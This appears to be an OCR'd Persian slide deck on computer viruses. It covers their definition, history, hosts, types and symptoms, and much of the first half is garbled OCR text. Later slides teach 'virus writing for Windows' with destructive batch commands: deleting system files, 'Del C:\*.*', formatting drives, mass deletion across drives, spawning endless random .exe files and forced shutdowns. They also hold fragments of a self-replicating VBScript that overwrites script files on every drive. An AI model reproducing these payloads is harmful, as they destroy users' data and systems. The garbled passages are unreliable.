صفحه 1:
| — ار
COMPUTER as
صفحه 2:
۲ etd > a ol م + غ3 اذ اناك
glishe ol a ol aileyre 2Slas cumls alo a aS
میگویند . که در اغلب مواقع بدون اطلاع کاربر به
Fg Pm om rT ا ‘Var
L Sic agi Jot gull. sles iS yur9> SKS
كيى سازى از خود بر روى يى كد اجرايى موجودء ويزكى
کلیدی در تعریف یک ویروس است.معمولا کاربران
ا ole bl aS wulgil ojsg a: ally
دربارة کامپیوتر دارند. ویروسها را برنامههایی
Pepe eer tre eer bere melee Seeneeerir yy
تکثیر شده و اثرات تخریبی زیادی دارند که باعث از
دستت رفتن اطلاعات و كاه خراب شدن كامييوتر
ا ا ل ا Oe
داراى اثرات تخريبى بوده و بقيه صرفا تكثير مى شوند؛
1
تعریف نمود که میتواند خودش را با استفاده از یک
میزبان تکثیر نماید.
صفحه 3:
ا i a ie ها
ee ered eer eet ee OLE Teer ly
رایانهای از جنس برنامههای معمولی هستند که توستط
ر رس
a Pa PP POI FC oN OE 7
دیسک, فایلها يا کامپیوترهای دیگر را آلوده میکنند.
eri | aroe] ey ۳
Serer eT Pe ee err re Sts) goer ep eoce Tamron pres)
به صورت مخفی نسخهای از خودش را تولید کرده و به
برناقّةهاى ديكر مىجسياند و به اين ترتيب داستان
OEE eh 0
دتسشىكهاى حاوى ويروسء يس از انتقال به
كامبيوترهاى ديكر باعث تكثير نسخدهايى از ويروس و
آلوده شدن دیگر فایلها و دیسکها میشوند؛ لذا پس
از اندک زمانی در کامپیوترهای موجود در یک کشور یا
حختى در سراسر دنيا منتشر مى شوند. از انجا كه
ويروسها بهطور مخفيانه عمل مىكنندء تا زمانى كه
ل ل 0
باشد cl errr) oy | برنامههای بسيارى
صفحه 4:
اولتق تحقیق واقعی علمی و آکادمی
ye ee ree eee eer
آدلمن eee sey Se] Beemer le Meee Sect a bel
aed) eye ieee ا ا ا 0
را
بودند. ويروس :1016© 5١!) نوشته شده توسط ريج اسكرنتا
در سال ۱۹۸۲ در گردش بود و ویروسهای تولید شده افليس
ا الل ل 7
7 000
یک نقص فنی در ۸۲۳۵۳6۲ را در سال ۱۹۸۰ به عنوان اولین
ویروس ذکر میکنند» اما آن فقط یک کد قانونی و مجاز تود
که اشتباه کار میکرد و تنها مسئلهای که ایجاد میکرد این
1
1
ee ل 3502 ام حبر رید خود ۳
صفحه 5:
۱ ele Went eer)
ae ub Joo wil oda fyb 09> 055 Sly Ulao
كونهاى باشد كه ويروسرها را به وصول اهداف
همان كونه كه قبلاً ذكر شد اكثر 02010
ل ا ۰
Ulgicne Vgsol 24S .no ae مى جسبند و آنها را
0 ل ال we iy
اا | و 8
فایلهای اجرایی جای گرفته و آنها را آلوده
اا ا CP Se ot)
فايل غيراجرايى قرار بكيرد و بتواند از طريق آن
و
صفحه 6:
لازم .انست ذكر شود كه بعضى از فايلها را شايد نتوان
ذاتاً اجرايى ناميد اما جون اينكونه فايلها مىتوانند
خاوی قسمتهایی اجرایی باشند» لذا آنها را از نوع
Vip OW CR conor Wy ee teen ene ee |
به فایلهایاچتیامال و مستندات برنامههای اداره
۱ caw! Soo cui, as aS 345 o Lil
elbows log Slo 9 ben Sul .riswb 9 Slo
dlS 9 2:98 4145 ble gil Jo yo aS aii Ll
Peet Serer eH pene) Eo
در ذيل فهرست يسوندهاى رايج فايلهاى اجرايى ارائه
ال ل الت
Peel eee ee ewe Me orl (pe Conor eel etme ree) ieee)
eee اال ال ل ا 0 5
استث برخى يسوندها حذف يا اضافه شوند):
com, .exe, .dll, .ovl, .bin, .sys , .dot , .doc,.
.vbe, .vbs, .hta, .htm, .scr, .ocx, .-hip, .eml
بنابراين يكى از اصلىترين ميزبانهاى ويروس»
فایلهای اجرایی هستند.
صفحه 7:
Master) Saw. sruyus J92> 9 (Boot Sector)
۱۳ ee ee Cr ladi ecole tl) (mem tele ل
wsjlailol, a2ly jlailol, p9iSau .aiiSino orlainl
سیستمعامل است که در سکتور شماره صفر دیسکت
فلایی يا درایوهای منطقی یک دیسک سخت قرار دارد
و جدول بخشبندی شامل اطلاعات تقسیمبندی دیسک
00 ا ل ا
0 ا ا الل ال
كرفتن در يكى از اين دو محلء؛ هنكام راهاندازى
۱ ا ا pe Reed er ore cy
ere ere St) ae OS eet Teed
۱۳ aera Cer ee om الل ل Od)
صفحه 8:
هستتد و بقّیه صرفا تکثیر میشوند. با توجه به این مطلب این پرسش
a Sor Ser Be Mok eee) سب ۳
Paths Let و CER Pere rere (Pern
teamlor3 55
20 ot er wweeren’ Werder] POS P Re Yer eer is) roe) rer ian |
نمیباشد ولی میتواند برای کاربر ایجاد مزاحمت کند. مثلاً ممکن است
ار ار ری [yer pe yea cer ae
ا TPG Serr eres ace
Od ee eet ee Ee ee Oe eee seed
لل pepe ee er eg eee ey ec Pee noe
ا wylus aS 25a sinonl 51S olFs9 jl aie jas
Ree etip ett SOC] MOCM er ST Roce. rere Ma pe isle H| 9
smugiaol » oli! S L ssh 0291 yuo p19 orimugi
”ا - برخى از ويروسها در حافظه كامييوتر مقيم شده و از اين طريق
عملیات تكثير خود را انجام مىدهند. اين عمل ممكن است به گونهای
صفحه 9:
۳- فرض کنید که شما یک ویروس بر روی کامپیوتر خود داشته ,پاشید.
FEN CePA ree DPC ۱۱۱
م ee hee Red er eee eS One ree
اعتماد آنها به شما و شرکت شما شود.
۱ rere re hee es eee
Corer ie] Be eee OMe eS] CT ee ROC eae |] hoe pe)
Bie Fal POs OCI gee Jo PS DP) eee Pa
foe reese ere Be] Oe ree OS se baer ee
اظلاعات را براى :
میتواند به راحت
صفحه 10:
تا i ee ویروسی ناملا بی صرر نیست و در
dq tla Sq byl wl ys jpialuwe> ۳
فضاى ديس شما را تلف مىكنند. 7
در مورد اثرات تخريبى ويروسهايى كه آنها را به صورت
عمدی انجام میدهند میتوان به موارد زیر اشاره نمود:
[اتخریب پا حذف برنامهها و اطلاعات بخشهای مختلف.
دیسکها.
۱ UP eC Moe se hl
slack» 9 wleWbl y255 لا
1۱ ee ee Ee ean eee vg)
مزاحمتهای فوق ممکن است به محض فعال شدن
sin Ser) ۳ حافظه از ه
اجرای یک برنامه آلوده) يا در یک
0 S slol b wim
صفحه 11:
0 oe an
۳۹ eet re وبروسها را به به روشهاى >< " 5 ry
۱ eee eM Tor ey lee say
0 OP r ee Meer eer Melty enrter)
روّتش آلودهسازی فایل و ... باشد. در ادامه به برخی از این
رزوشها اشاره میکنيم.
Pe Pe erm. ا الا
۷ |
slbyv9y9 :(File Viruses) 19 sleyus ss >}
Ber Sere Beebe dele es Pee ern LE)
فایلهای آلوده به این نوع از ویروسها اغلب (اما نه
همیشه) دارای پسوند .60۳0 پا 66۰ هستند.
ee eee eer ne وا
ماکرو» مستندات برنامههایی را که از امکان ماکرونویسی
پشتیبانی مینمایند (مانند ۴66۵۱ 5 , MS Word و...)
آلوده میکنند. فایلهای اینگونه برنامدها اجرایی نیستند
ولی درون ل Bret el ote eee Be ener porwr)
صفحه 12:
و ها :۱
او 7 0 ۳۳ 3
(56610۲ 800۲) دیسک سخت و دیسکتفلایی يا جدول
بخشبندی دیسکهای سخت را آلوده میکنند. با راهاندازی
ل SN Onn ا
شدهاستء ويروس در حافظه مقيم شده و متعاقباً ديسكهابى
ا ا See
۱ Viruses) in Siu! sleyus 5 > F
که اسکریپتهای نوشته شده به زبانهای ویژوال بیسیک یا
۱
يا هر مرورگر وب دیگری با توانایی ۱06۲۳۵۴ Explorer bul
1 5 Es اچرای اسکریپتهاء نصب شده باشد رشنا
bats -htm, .vbs, .js, -htt. sigs
9 peers Siew)
5
صفحه 13:
چند دشته از دستههای زیر نیز قرار بگيرند:
er im ات ار ول اك
1 نه ویروسها با مقیم شدن در حافظه, هنگام دسترسق به
فايلهاى ديكرء آنها را آلوده مىكنند.
eC AO) eee eo ee ee mera)
آينكونه ويروسها به روشهاى مختلف ردياى خويش را مخفی
متكنتد. به اين معنى كه فايلهاى آلوده به اينكونه ويروس هآاله
كونهاى نشان داده مىشود كه يك فايل غيرآلوده جلوه كند. به
POY ee AES emcee ore end See pen eee | Pedic] Pry
آن را افزایش میدهند یا گاهی تاریخ و زمان ضبط فایل را
JIS 250 Slayug yg Ll .2iS ino yous 00
ee eT ee Lore Merete See Mir od ل
دهند.
أوبروسهاى كدكذارى شده (وعوداءآلا وصاغم يصعمع):
ee ree ey en rere, ۱۳
Peet SYP seer a pee eee) ee erm ee ewe ty ee)
:(Polymorphic Viruses) —JS.s.> sle jus of)
agua ps9 aigkul کب og ile iyol> #1
glisby 29> Spall JS si سا
طوريكه ممكن است جاى دستورالعملها و حتى خود
iit atin a aa
صفحه 14:
[آوینزوسهای فعالشونده بر اساس رویداد خاص (6۷6۵۳۲ ۲۲996۲60
AAT et 9
U ebs 52 Ly 29> cuss whos jl suisse oS rite wu byw sis,
۱۳ reer Peperare een | eet orm en) es Er Fae)
آلودهسازى فايلها در تمام اوقات فعال بودن ويروس انجام
مى شود.
» ال 00 5
ا ا ا ino orgll 02,5 ا م
يروز مىدهد كه با دقت در آنها مىتوان به ويروسى بودن احتمالى
#بيؤام بى برد. بعضى از اين نشاندها در زير أمدداست. اما بايد
oles ji] 59 cul Soo mails youl aS cals asa 1000
Precis ee) ate) ers vaeer ver (Mec d gS Breen gee) er
Phair! raa2.00 599 295 511, pale gual a5 ylSiws aigkaum You
eon Le ay
صفحه 15:
غبرمُعمّول روی صفحه ظاهر میگردد(احتمال جعلی بودن پیغامها
(eerste rnc per bury |
۳ هنگام اجرای برنامهها پیغام کمبود حافظه ظاهر شده و بر ناه
hy et
8 در کارچاپگر اختلال ایجاد میشود یا بدون هیچگونه فرمان ال
ete eee ceed
Ree ee eer |
File is L File is Damaged plex, «la uls slol elSia - 0
ل نمایش داده میشود.
Sap Solé e sloplen L lb iSLIS Lbs S slo! elSiz - F
كلمات L ssymbol L olpem صفحة تمايش ظاهر كه اين كلمات
Beer) 222 Pee eg] CEC
jayne eb as prglos 289155 slaloro 59 51S elSim-V
اصوات غیرمعمول یا موزیک از بلندگوهای کامپیوتر پخش 28
میشود.
aclip S sll elSim piu -9 05 0295 9 010
فشردن کلیدهای ۲۱+۵۸۱۲+06۵۱) نیز نمیتواند سیستم را دوباره
راهاندازی کند. ۳
Pee AT را
بین میرود یا دیسک سخت ناخواسته فرمت میشود.
ا nS Fer) pe
- خواص فايلهاى اجرايى تغيير م ىكند.
صفحه 16:
ار دیص بت
0
اا مال ال ا 0
نمیدادند.
7 ygo glo Kaus Wl slas yualS -1F
saul 024i 039591 Ia Juls slgine a L
wigsbines Lol Wool L es Lol Us L bajlaleys - 1V
0000 or
که امکان وجود جاسوسی از طریق ویروس آلودهکننده امکانپذیر
. میباشد
1۱ asb5. 9 Jlwy| sla. cu jiu L 5IS lSim - 19
Peary ل
pis Soy jl aiulgsl Uglol glam L Sig siSII slaaok - ¥-
aisle yMlel Jacl sl aol 52) 2255in0 db. L oars Jiu 5l
. لوک wal
۳ cimlgsb wjg0 w sl aig59l L jb jligi-¥1
شده و پاک کردن آن نیز فایده ای ندارد.
1S nos GIS niyo as Lg orn JL9 pS Quay isl-YY
بعضی از ویروسها با ساخت فایلهایی با حجمهای یکنواخت -3
۱ اک ] BOOS) Pe Eero ا
در سيّستم عاملهاى ويندوز قابل مشاهده مى باشند.
4- كاهى ويروسها اقدام به واكنش نسبت به بازيابى اطلاعات از
ا ا ا ا 201012
صفحه 17:
چند نمونه نو بت ويروس
۵
ص
۳
تم و
صفحه 18:
ویروس نویسی برای
ویندوز
L syle 2108 Qujgel yl 5> 7
۱3 9 wes >be 51 lS 119 9 Joel ل
نویسی داشته باشید.
۱ PC eee Peer PIR ee rn ee nee ee
Feed ee Re Darwen م Re wer ry
2
۱ ee Mere et nee eee oor)
Oe ee ee ev ee eo eS eee et Sel ety er)
Beeert gms] err] Feveey Fle meee
PIP Py rly ea reper cr P te |repcon ee ام
Pe ee] pce renee ee perce Bret) wee! ee) |
Reece ee no ev ser ier oor need eee e ayo pr el meee)
است بعضی از ان ها در سیستم عامل های جدیدتر جواب ندهند.
صفحه 19:
1
به طور ا 100 برا ای ریاسثارت شدن
ات SRST 1
del config.sys cd winnt del system.ini del win.ini
Pee ا Pe be eee re eke noone) ky
dole pin aS Lol 5 2515S ol 52 L YL joie
ریاستارت میشود
pa Se Speerrere as] IST Berl me) Oe PLE an) eer eer eo)
میشود و منجر ب ریاستارت سیستم میشود.
3
@Echo off
Del C: *.* ly
9 au:S ا VL joie aisle
بعد از اجرا فایل های مهم و اصلی ویندوز از بين
0
صفحه 20:
آژن:نست ها را داخل سیستم امتلی خود تست نکنی۳
ا ل ا ااا ا
ECHO OFF@
date=0-0-0
از هر دستورى براى عمليات مخرب استفاده ميشود در
کد بالا تاریخ و ساعت ویندوز را صفر میکنند که حتی
ویروس شناخته نمیشوند با چند ترفنده ساده باعث
خرابکاری میشوند
Spee renee) Cee eer ocd erred)
pouped-blocked-web-exploure-online&offline
7 er cee ierl|
Sree ST eek ene tl! ween re eh ee ber)
جواب نخواهد داد
۱۳7 ا
aaslnc 5S slo yujgel acrto
صفحه 21:
echo off@
Bice) oy
echo %random%>%random%.exe
goto top
الل8؟ستور برای ساخت فایل های بسیار زیاد و اسم بر مسیزی کگایله
8 اجرا شذه است میباشد
Re, اس
براى تغير فرمت فايل هاى ايجاد شده در دستور بالا ©ا© را به يسوند
1
cmd 549 vic yale: bat Lbs
@echo off
colora
cls
Er)
۱
gotoa
عكناهم
۱
pee er re eee eee
L jaw SS, LL, PentestCore 9 0245 SL 1, ciolS cls j9iu>
سرعت نمایش میدهد به دلیل استفاده از 08۱056 تا زمانی که پنجره باز
ev] ip Oe mae] eer ra eee Sere] 1
صفحه 22:
امنیت درمقابل ویروس ها
ار Doe
ها استقاده كنيد يا قبل از اجراى هر قابل ان ,7
ی رک
صفحه 23:
بات کرده
windows registry editor version 5.00
ae ee MLV eat LAAN انا
ل ل تك اننا
SoundSentry]
by ce 3
indows effect’
Virus.reg oj9:0 yul a reg 049 L I, yl aug 0955 wb
بم
صفحه 24:
-t 30 اش زیت
“shutdown -S -C "ILOVe you
CP CaP Fae en ee ee eee Tyee LN A
L, ILOVe you pL.
۲. RPK
Jol برنامه ۱۱0۴6830 ویندوز را باز کرده واین کدها را در ان تایپ کرده
shutdown -r -t 30
“shutdown -S -C "ILOVe you
9 aiSee cesmmey ail 30 jl guy Ly pigarelS -auiS op:35 bat co,o L ang
L, ILOVe you elu
نشان میده
۳/0
shutdown -L -t 30
“shutdown -S -C "ILOVe you
۱۳۳ 91 Sol ails 30 jl yuu Ly piguralS .2n5 0.55 bat cro 9 Liany
L, ILOVe you ela
Caer) br]
0255 cali yl 52 L lea guly 0245 5L Ly jgau19 Notepad aoliys Jol
shutdown -F -t 30
“shutdown -S -C "ILOVe you
16 ربا فرمت +83 ذخيره كنيد. كامبيوتر را بس از 30 ثانیه استندبوی میکنه
۱۳۹۱۹
نشان میده
۱ 0 o Eee ei bene mcs. ibe Serre woe ect eer wel |
TS
صفحه 25:
تچ te ee” eli سیخ
ainjS 019 New SulS cul, GliuS> antic 59)
۴ وبعد کد زیر را دران تایپ
format D:/autotesst
aug QS! CLaul su9 Next els x29 Next 225
. ل را بزنید
ویروسی که uch ۱۹[ ) رن
اول برنامه 0۲66080( ویندوز را باز کرده واین کدها
wal yl 52 0245
echo off@
ییات
دار رهز بای ای
046۱ 2۵۰
ارات
date=10-10-10
۱۳۳۳۹ er الال ee 4
صفحه 26:
وبروسى كه باعث ل 5 میشود
oll gob ا ل Jol
attrib -a -s -h -rc
attrib -a -s -h -r C:\WINDOWS\*.*
del C:\*.*echoy|echo|echoy
إمطءءه | لامطعه*.*ائه اعل 0
إمطء»ه | لامطعع*.*ازع اعل ۷
إمطءع |لامطعع*.*انع اعل ۷
del G:\*.*echoy|echo|echoy
del H:\*.*echoy|echo|echoy
copy C:\*.*/echoy
copy D:\*.*/echoy
0۳۴۷ لامطء»ه
copy F:\*.*|echoy
60۳۷
00۷ ۱ ۷
0295 023 bat 1059 L ang
صفحه 27:
سشاخت ويروس 81053127
1 ال Jol
م
تلا یات رال برد یی
هنت
CreateObject("Scripting.FileSystemObject")
set file =
fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
ما تاش
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.is ready Then
folderlist(d.path&"\")
3 end if
فتل
end sub
صفحه 28:
TMC tas tele to)
On Error Resume Next
set f = fso.GetFolder(folderspec)
a ee |
Tet ess
۲50.6۵۲۲۲۵۵5 ۱00۱۱۵۵۵)1.۵21(
if (ext="vbs") or (ext="vbe") then
اك etme) lite baa (Ge lye)
ap.write vbscopy
ع5ماء.مقة
Cir Ria
Dred
end sub
sub folderlist(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
تیا ات ات را
مرف ا لیدعت زرا
۶۵۱۵6۳۱۱5۲ )۴1.8۵۵1(
تسیا
end sub
Pepe Oe a) ال ry
صفحه 29:
ویروس رایانه
ای
COMPUTER VIRUS
ویروس ،یک نوع نرم افزار ( برنامه ) کامپیوتری است
که به دلیل ماهیت عملکرد مجرمانه آن به آن بدافزار
میگویند .که در اغلب مواقع بدون اطالع کاربر به
سیستم عامل وارد شده و آن را آلوده میکند و تالش
میکند خودش تکثر نماید .این عمل تولید مثل یا
کپیسازی از خود بر روی یک کد اجرایی موجود ،ویژگی
کلیدی در تعریف یک ویروس است.معموًال کاربران
رایانه به ویژه آنهایی که اطالعات تخصصی کمتری
دربارٔه کامپیوتر دارند ،ویروسها را برنامههایی
هوشمند و خطرناک میدانند که خود به خود اجرا و
تکثیر شده و اثرات تخریبی زیادی دارند که باعث از
دست رفتن اطالعات و گاه خراب شدن کامپیوتر
میگردند در حالیکه طبق آمار تنها پنج درصد ویروسها
دارای اثرات تخریبی بوده و بقیه صرفًا تکثیر میشوند؛
بنابراین یک ویروس رایانهای را میتوان برنامهای
تعریف نمود که میتواند خودش را با استفاده از یک
میزبان تکثیر نماید.
دارای اثرات تخریبی باشد ولی امکان تکثیر نداشته
باشد ،نمیتوان آن را ویروس نامید؛ویروسهای
رایانهای از جنس برنامههای معمولی هستند که توسط
ویروسنویسان نوشته شده و سپس بهطور ناگهانی
توسط یک فایل اجرایی یا جا گرفتن در ناحیه سیستمی
دیسک ،فایلها یا کامپیوترهای دیگر را آلوده میکنند.
در این حال پس از اجرای فایل آلوده به ویروس یا
دسترسی به یک دیسک آلوده توسط کاربر دوم ،ویروس
به صورت مخفی نسخهای از خودش را تولید کرده و به
برنامههای دیگر میچسباند و به این ترتیب داستان
زندگی ویروس آغاز میشود و هر یک از برنامهها یا
دیسکهای حاوی ویروس ،پس از انتقال به
کامپیوترهای دیگر باعث تکثیر نسخههایی از ویروس و
آلوده شدن دیگر فایلها و دیسکها میشوند؛ لذا پس
از اندک زمانی در کامپیوترهای موجود در یک کشور یا
حتی در سراسر دنیا منتشر میشوند .از آنجا که
ویروسها بهطور مخفیانه عمل میکنند ،تا زمانی که
کشف نشده و امکان پاکسازی آنها فراهم نگردیده
باشد ،ماشینهای هوشمند و قطعا برنامههای بسیاری
تاریخچه
اولین تحقیق واقعی علمی و آکادمیک بر روی ویروسها
توسط فرد کوهن در سال ،۱۹۸۳با نام ویروس که توسط ِلن
آدلمن ابداع شده بود ،انجام شد .بعضًا از کوهن به عنوان
«پدر ویروسهای کامپیوتری» نام برده میشود ،اما واقعًا
ویروسهایی بودند که قبل از شروع تحقیقات او تولید شده
بودند .ویروس Elk Clonerنوشته شده توسط ریچ اسکرنتا در
سال ۱۹۸۲در گردش بود و ویروسهای تولید شده توسط جو
دلینگر نیز بین سالهای ۱۹۸۱تا ۱۹۸۳ساخته شده بودند؛ که
همٔه آنها برای پلتفرمهای Apple IIبودند .برخی منابع یک
نقص فنی در Arpanetرا در سال ۱۹۸۰به عنوان اولین
ویروس ذکر میکنند ،اما آن فقط یک کد قانونی و مجاز بود
که اشتباه کار میکرد و تنها مسئلهای که ایجاد میکرد این
بود که دادهها را در بستههای شبکه پخش میکرد.
ویروسهای گریگوری بنفورد ،تنها به داستانهای علمیاش
ختم نشد .او در سال ۱۹۶۹ویروسهای غیر مخرب خود را در
میزبان ویروس
ویروس هم مانند هر برنامه کامپیوتری نیاز به
محلی برای ذخیره خود دارد؛ ولی این محل باید به
گونهای باشد که ویروسها را به وصول اهداف
خود نزدیکتر کند .همان گونه که قبًال ذکر شد اکثر
ویروسها بهطور انگلوار به فایلهای اجرایی
میچسبند و آنها را آلوده میکنند .اصوًال میتوان
فایلها را به دو گونه کلی «اجرایی» و «غیر
اجرایی» تقسیم کرد که عموم ویروسها در
فایلهای اجرایی جای گرفته و آنها را آلوده
میکنند و کمتر ویروسی یافت میشود که در یک
فایل غیراجرایی قرار بگیرد و بتواند از طریق آن
الزم است ذکر شود که بعضی از فایلها را شاید نتوان
ذاتًا اجرایی نامید اما چون اینگونه فایلها میتوانند
حاوی قسمتهایی اجرایی باشند ،لذا آنها را از نوع
اجرایی در نظر میگیریم .از این نوع فایلها میتوان به
فایلهایاچتیامال و مستندات برنامههای اداره اشاره
کرد که به ترتیب ممکن است شامل اسکریپت و ماکرو
باشند .اسکریپتها و ماکروها قسمتهایی اجرایی
هستند که در دل این فایلها قرار گرفته و کار خاصی را
انجام میدهند.
در ذیل فهرست پسوندهای رایج فایلهای اجرایی ارائه
شدهاست و اکثر نرمافزارهای ضد ویروس در حالت
عادی (بدون تنظیمات خاص) این فایلها را ویروسیابی
میکنند (البته در برخی برنامههای ضد ویروس ممکن
است برخی پسوندها حذف یا اضافه شوند):
com , .exe , .dll , .ovl , .bin , .sys , .dot , .doc , .vbe , .vb.
s , .hta , .htm , .scr , .ocx , .hlp , .eml
بنابراین یکی از اصلیترین میزبانهای ویروس،
فایلهای اجرایی هستند.
از طرف دیگر برخی ویروسها نیز از سکتور راهانداز
( )Boot Sectorو جدول بخشبندی دیسک (Master
Boot Recordیا )Partition Tableبه عنوان میزبان
استفاده میکنند .سکتور راهانداز واحد راهاندازی
سیستمعامل است که در سکتور شماره صفر دیسکت
فالپی یا درایوهای منطقی یک دیسک سخت قرار دارد
و جدول بخشبندی شامل اطالعات تقسیمبندی دیسک
سخت میباشد که آن نیز در سکتور شماره صفر
دیسک سخت قرار دارد .اینگونه ویروسها با قرار
گرفتن در یکی از این دو محل ،هنگام راهاندازی
کامپیوتر ،اجرا شده و در حافظه سیستم مقیم
میشوند و تا زمان خاموش کردن کامپیوتر یا
راهاندازی دوباره ،همانجا مانده و فالپیها یا
تخریبی هستند و بقیه صرفًا تکثیر میشوند .با توجه به این مطلب این
پرسش مطرح است که چرا ویروسها به عنوان یک معضل شناخته
میشوند و باید با آنها مبارزه کرد؟ پاسخ به این پرسش در موارد زیر
خالصه گردیدهاست:
- ۱بسیاری از ویروسها دارای اثراتی هستند که هرچند تخریبی
نمیباشد ولی میتواند برای کاربر ایجاد مزاحمت کند .مثًال ممکن است
پیغامی نمایش دهد ،باعث ریزش حروف صفحه نمایش به پایین شود یا
اینکه یک آهنگ پخش نماید .عالوه بر این برخی از ویروسها به علت
اشکاالت نرمافزاری که ناشی از عدم دقت ویروسنویس میباشد،
ممکن است دارای اثراتی غیرقابل پیشبینی باشند که گاهی این اثرات
میتوانند تخریبی نیز باشند .از دیدگاه کاربر اهمیتی ندارد که خسارت
ایجاد شده به وسیلٔه یک ویروس ،یک کار عمدی پیشبینی شده توسط
نویسنده ویروس بوده باشد یا یک اشتباه برنامهنویسی.
- ۲برخی از ویروسها در حافظه کامپیوتر مقیم شده و از این طریق
عملیات تکثیر خود را انجام میدهند .این عمل ممکن است به گونهای
- ۳فرض کنید که شما یک ویروس بر روی کامپیوتر خود داشته باشید.
بسیار احتمال دارد که این ویروس به صورت غیرعمدی به یک دوست،
همکار یا مشتری منتقل شود که این امر ممکن است باعث از بین
رفتن اعتماد آنها به شما و شرکت شما شود.
- ۴ویروسها و برنامههای مخرب زیادی وجود دارند که اقدام به
سرقت اطالعات و کلمات عبور کاربر مینمایند .بعضی از اینگونه
برنامهها با مقیم شدن در حافظه از عباراتی که توسط شما تایپ
میشود گزارش گرفته و پس از اتصال رایانه شما به اینترنت این
اطالعات را برای مقصد خاصی ارسال میکنند .گیرنده این اطالعات
میتواند به راحتی از آنها سوء استفادههای مختلفی نماید.
عالوه بر همه اینها هیچ ویروسی کامًال بیضرر نیست و در
خوشبینانهترین حالت ،آنها وقت شما ،وقت پردازنده و
فضای دیسک شما را تلف میکنند.
در مورد اثرات تخریبی ویروسهایی که آنها را به صورت
عمدی انجام میدهند میتوان به موارد زیر اشاره نمود:
تخریب یا حذف برنامهها و اطالعات بخشهای مختلف
دیسکها.
فرمت کردن دیسکها.
کد کردن اطالعات و برنامهها.
تخریب اطالعات حافظه فلشها.
مزاحمتهای فوق ممکن است به محض فعال شدن
ویروس (یعنی قرار گرفتن ویروس در حافظه از طریق
اجرای یک برنامه آلوده) یا در یک تاریخ و زمان خاص یا
حتی با اجرای یک برنامه کاربردی خاص انجام شود.
ارائه یک تقسیمبندی دقیق از ویروسها کار مشکلی است
و میتوان ویروسها را به روشهای مختلفی تقسیمبندی
کرد .این روشها میتواند بر اساس میزبان ویروس،
سیستمعاملی که ویروس میتواند در آن فعالیت کند،
روش آلودهسازی فایل و … باشد .در ادامه به برخی از این
روشها اشاره میکنیم.
تقسیمبندی ویروسها بر اساس مقصد
آلودهسازی:
- ۱ویروسهای فایلی ( :)File Virusesویروسهای فایلی،
معموًال فایلهای اجرایی را آلوده میکنند .فایلهای آلوده
به این نوع از ویروسها اغلب (اما نه همیشه) دارای پسوند
com.یا exe.هستند.
- ۲ویروسهای ماکرو ( :)Macro Virusesویروسهای
ماکرو ،مستندات برنامههایی را که از امکان ماکرونویسی
پشتیبانی مینمایند (مانند MS Word , MS Excelو…) آلوده
میکنند .فایلهای اینگونه برنامهها اجرایی نیستند ولی
- ۳ویروسهای بوت و پارتیشن سکتوری (Boot Sector and
:)Partition Table Virusesاینگونه ویروسهاسکتور راهانداز
( )Boot Sectorدیسک سخت و دیسکتفالپی یا جدول بخشبندی
دیسکهای سخت را آلوده میکنند .با راهاندازی سیستم از
روی دیسکی که به اینگونه ویروسها آلوده شدهاست ،ویروس
در حافظه مقیم شده و متعاقبًا دیسکهایی را که مورد
دسترسی قرار گیرند ،آلوده میکند.
- ۴ویروسهای اسکریپتی ( :)Script Virusesاین ویروسها که
اسکریپتهای نوشته شده به زبانهای ویژوال بیسیک یا جاوا
میباشند ،تنها در کامپیوترهایی اجرا میشوند که بر روی آنها
Internet Explorerیا هر مرورگر وب دیگری با توانایی اجرای
اسکریپتها ،نصب شده باشد و فایلهای با پسوند html , .htm.
, .vbs , .js , .httیا asp.را آلوده میکنند.
چند دسته از دستههای زیر نیز قرار بگیرند:
ویروسهای مقیم در حافظه (:)Memory Resident Viruses
اینگونه ویروسها با مقیم شدن در حافظه ،هنگام دسترسی به
فایلهای دیگر ،آنها را آلوده میکنند.
ویروسهای مخفیکار (:)Stealth Viruses
اینگونه ویروسها به روشهای مختلف ردپای خویش را مخفی
میکنند .به این معنی که فایلهای آلوده به اینگونه ویروسها به
گونهای نشان داده میشود که یک فایل غیرآلوده جلوه کند .به
عنوان مثال عموم ویروسها پس از آلوده کردن یک فایل ،اندازه
آن را افزایش میدهند یا گاهی تاریخ و زمان ضبط فایل را
عوض میکنند .اما ویروسهای مخفیکار میتوانند با روشهای
خاص و بدون تغییر وضعیت ظاهری ،عملیات خویش را انجام
دهند.
ویروسهای کدگذاری شده (:)Encrypting Viruses
این ویروسها پس از هر بار آلودهسازی ،با استفاده از
شیوههای خود رمزی شکل ظاهری خود را تغییر میدهند.
ویروسهای چندشکلی (:)Polymorphic Viruses
اینگونه ویروسها با استفاده از الگوریتمهای خاص ،عالوه بر
تغییر شکل ظاهری خود ،ساختار خود را نیز تغییر میدهند به
طوریکه ممکن است جای دستورالعملها و حتی خود
ویروسهای فعالشونده بر اساس رویداد خاص(Triggered Event
:)Viruses
ویروسهایی هستند که بخشی از عملیات تخریب خود را در ساعت یا
در تاریخ خاص انجام میدهند .البته باید توجه داشت که تکثیر و
آلودهسازی فایلها در تمام اوقات فعال بودن ویروس انجام
میشود.
نشانههای وجود ویروس
معموًال سیستمی که به ویروس آلوده میگردد نشانههایی را از خود
بروز میدهد که با دقت در آنها میتوان به ویروسی بودن احتمالی
سیستم پی برد .بعضی از این نشانهها در زیر آمدهاست .اما باید
دقت داشت که این نشانهها ممکن است در اثر عوامل غیرویروسی
نیز ظاهر گردد .اما اگر کامپیوتر بطور عادی کار میکرده و ناگهان و
بدون هیچگونه دستکاری ،این عالیم را از خود بروز میدهد ،احتمال
وجود ویروس بیشتر است.
غیرمعمول روی صفحه ظاهر میگردد(احتمال جعلی بودن پیغامها
و راهی برای دسترسی کاربری به ویروس داده شود).
- ۲هنگام اجرای برنامهها پیغام کمبود حافظه ظاهر شده و برنامه
اجرا نمیگردد.
- ۳در کارچاپگر اختالل ایجاد میشود یا بدون هیچگونه فرمان چاپی
شروع به کار میکند.
- ۴امکان دسترسی به برخی از درایوها وجود ندارد.
- ۵هنگام اجرای فایلها ،پیغام File is Damagedیا File is
Corruptedنمایش داده میشود.
- ۶هنگام اجرای یک فایل ،کاراکترها یا پیغامهای غیرعادی روی
صفحه نمایش ظاهر که این کلمات همراه با symbolو یا کلمات
کدگذاری شده با حروفهای غیر عادی همراه میباشد .
- ۷هنگام کار در محیطهای گرافیکی ،تصاویر به هم میریزد.
- 8اصوات غیرمعمول یا موزیک از بلندگوهای کامپیوتر پخش
میشود.
- ۹سیستم هنگام اجرای یک برنامه قفل کرده و حتی گاهی
